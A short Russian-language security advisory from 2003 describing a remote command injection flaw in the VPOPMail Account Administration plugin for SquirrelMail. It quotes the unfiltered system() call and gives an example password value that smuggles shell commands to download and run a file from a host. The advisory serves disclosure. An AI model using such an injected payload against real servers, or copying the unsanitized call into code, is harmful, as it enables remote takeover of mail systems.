Дата публикации: | 18.03.2003 |
Всего просмотров: | 992 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | VPOPMail Account Administration 0.x |
Описание: | Уязвимость в проверке правильности ввода обнаружена в плагине 'VPOPMail Account Administration' для SquirrelMail и vpopmail. Удаленный пользователь может выполнять произвольные команды на системе.
Программа не фильтрует пароль пользователя в сценарии 'vpopmail.php', перед его принятием в запросе system(): system("$vpasswd $username $pwd");В результате удаленный пользователь может представить специально обработанное значение для пароля, которое содержит команды оболочки, которые будут выполнены на целевом сервере. Пример: passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;Команды будут выполнены с привилегиями процесса 'vpopmail'. Уязвимость обнаружена в VPOPMail Account Administration (squirrel mail) 0.9.7 |
Ссылки: | VPOPMail Account Administration (squirrel mail) version 0.9.7 |